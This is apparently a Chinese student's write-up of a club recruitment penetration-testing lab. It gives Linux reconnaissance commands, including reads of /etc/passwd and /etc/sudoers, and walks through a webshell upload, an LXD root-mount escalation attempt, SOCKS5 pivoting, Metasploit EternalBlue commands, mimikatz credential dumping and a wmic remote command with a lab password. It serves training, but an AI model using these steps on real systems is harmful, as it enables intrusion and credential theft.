内网渗透 guetsec招新靶场

贴个linux信息收集的常用命令

1、内核，操作系统和设备信息

text

uname -a  打印所有可用的系统信息
uname -r  内核版本
uname -n  系统主机名。
uname -m  查看系统内核架构（64位/32位）
hostname  系统主机名
lsb_release -a   发行版信息
cat /proc/version  内核信息
cat /etc/*-release  发行版信息
cat /etc/issue    发行版信息
cat /proc/cpuinfo  CPU信息

2、用户和群组

text

cat /etc/passwd     列出系统上的所有用户
cat /etc/group      列出系统上的所有组
groups              当前用户所在的组
groups test         test用户所在的组
getent group xxx      xxx组里的用户
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'      列出所有的超级用户账户
whoami              查看当前用户
w                   谁目前已登录，他们正在做什么
last                最后登录用户的列表
lastlog             所有用户上次登录的信息
lastlog –u %username%  有关指定用户上次登录的信息

看到如sudo:x:27

可知yokan用户在sudo组里。

3、用户和权限信息

text

whoami        当前用户名
id            当前用户信息
cat /etc/sudoers  谁被允许以root身份执行
sudo -l       当前用户可以以root身份执行操作

4、环境信息

text

env        显示环境变量
echo %PATH 路径信息
history    显示当前用户的历史命令记录
pwd        输出工作目录
cat /etc/profile   显示默认系统变量
cat /etc/shells    显示可用的shell

实战

这里以咱们的靶场为例

1.突破前端

篇幅有限，先不谈。tomcat弱口令上传哥斯拉木马即可

2.linux提权

上传fscan后发现权限不足不能运行，没绷住。于是根据经验，我想到另一个办法，用socks5正向代理，再用fscan扫描

兴致勃勃地花了一个小时终于代理进去了，然鹅发现没啥卵用，fscan的sock5功能连不上服务器，于是放弃。不过作为sock5的链接已经搭好了，我决定还是留着，如果发现了啥内网的东西还能有用

好在天无绝人之路。查看组，发现我们在一个名叫lxd的组

lxd提权:

LXD 是基于 LXC 容器的管理程序，当前用户可操作容器。所以用户可创建一个容器，再用容器挂载宿主机磁盘，最后使用容器权限操作宿主机磁盘内容达到提权效果。

按照网上的办法一步步操作

上传alpine-v3.13-x86_64-20210218_0139.tar.gz
lxc 创建容器并别名为 test : lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias test
初始化容器 test 并设置选项 security.privileged=true，即允许容器以特权模式运行
init test test -c security.privileged=true
将宿主机的根目录 "/" 挂载到容器中的 "/mnt/root" 目录，recursive=true 选项表示在添加设备时递归创建目标路径
config device add test test disk source=/ path=/mnt/root recursive=true
启动容器 test 并打开一个 shell 会话，可以看到当前权限为容器的 root 权限（注意：不是宿主机的 root 权限）
start test然后lxc exec test /bin/sh

然鹅，最后一步的获取shell启动失败了，返回null

放弃这条路了,为了保持完整的环境，出来先删掉test容器

3.代理

于是我又把目光转向socks5代理

重新开启代理，链接

然后在proxifier配置规则

尝试链接127.0.0.1:8080端口，正向代理成功

思路一下子打开了，既然连接到内网成功了，那岂不是可以直接用物理机上的工具对内网进行扫描和渗透了吗？

验证猜想

首先用proxifier修改一下配置，让proxifier允许我们的代理

成功扫描到主机了！

接下来就用msf试试

做着做着突然发现对于windows的msf，不知道运行的是哪个exe，根本找不着。所以不懂Proxifier配置规则里的Application应该填什么...

经过长达两个小时的摸索终于找到办法了。。。

配置cmd.exe;fscan.exe;OpenConsole.exe;"E:\metasploit-framework*.exe"即可

终于扫描到代理来端口的漏洞了(心酸

不是，这是打算利用radit的漏洞来get shell吗？？怎么兜兜转转又回到刚开始的时候了....

算了不管了，到这一步了不想回头了，万一radit的shell权限更高呢？

md这个msf怎么用哇（哭惹

4.攻击

回去睡了一觉，突然就来灵感了

既然我已经代理到第一层内网，我何不扫扫ip看看有什么突破

网卡有个172.172.1.2的ip，用哥斯拉自带的portscan

发现这个网段上还有一个叫172.172.1.3的主机，还开放了3389和445端口

感觉这工具不行，我换了fscan扫描。一扫，我去，还真有东西，，，这不是永恒之蓝么

一下子来了兴致，感觉要有了

经过一番资料查阅，3389是用来远控的，445这端口挺危险，也是永恒之蓝漏洞利用的途径

按照网上的办法尝试msf的永恒之蓝

text

search ms17_010 
use 0
set rhosts 172.172.1.3
set rport 445
set lhost 192.168.10.16

经过漫长的等待，失败了。。。。。。花了一整晚搞，一直都是fail提示。。

就在我万念俱灰，准备砸电脑的时候突然提示win了卧槽不是哥们，

要来了要来了，输入shell！！！

。。。。。。又又又报错了。。。。。

后来万不得已了，只好厚脸皮求助学长，原来如此，搜嘎，哟西

后来切了payload，突然发现题目似了。似得很彻底，第一台靶机都上不去的那种似。反应给学长，学长维护去了，我也安心回去睡觉去了

早早就来社团了，继续搞

终于登上去了，load kiwi 使用猕猴桃，

这里得到了俩账户密码，一个是Administrators，一个是admin01。远程控制启动！

不是，怎么Administrators的账号密码不对啊。反而admin01进去了。。。不管了

进去就看到令人忍俊不禁的画面（图是后面截的，所以会有我的文件）

看来蛋挞哥捷足先登了，汗流浃背了哥们。。

故技重施，用fscan扫描，又又又发现一个永恒之蓝了。。。

一开始我就想着在msf上搞个路由，再用sock4代理，让攻击机能直接进入172.172.2的内网。。。后来没成功，会话挂了

后来又想着传msf木马到windows7，然而阿帕奇服务启动失败。。连不上攻击机。。好吧

msf的又打不进去了，一直弹fail(环境太卡了

蛋学长叫我做提权和域内移动，晕乎乎地看了几篇文章，没看明白，做数据结构作业去了

恍惚间又过了一天

拔草的时候看到蛋挞哥的文章，顿时思路打开了。原来之前猕猴桃的Administrators账户不是本机的，是域控机的。知道Administrators账户，就可以直接连接域控机子命令执行了

这里用了WMI进行命令执行

利用wmic命令执行dir /s /p c:\flag.txt寻找靶机c盘里flag文件，然后将回显输入到/ips.txt

具体命令如下

text

wmic /node:172.172.2.100 /user:Administrator /password:"GUETsec-2024" process call create "cmd.exe /c dir /s /p c:\flag.txt > c:\ip.txt"

然后就是读取回显type \172.172.2.100\c$\ips.txt

text

C:\Users\admin01>type \\172.172.2.100\c$\ips.txt
 驱动器 C 中的卷没有标签。
 卷的序列号是 38C9-3CF9

 c:\Documents and Settings\Administrator\Desktop 的目录

2024/09/18  09:00                32 flag.txt
               1 个文件             32 字节

这里可以找到flag的目录就是c:\Documents and Settings\Administrator\Deskto，我们直接读文件就行

结束，写数据要素论文去了。。。好累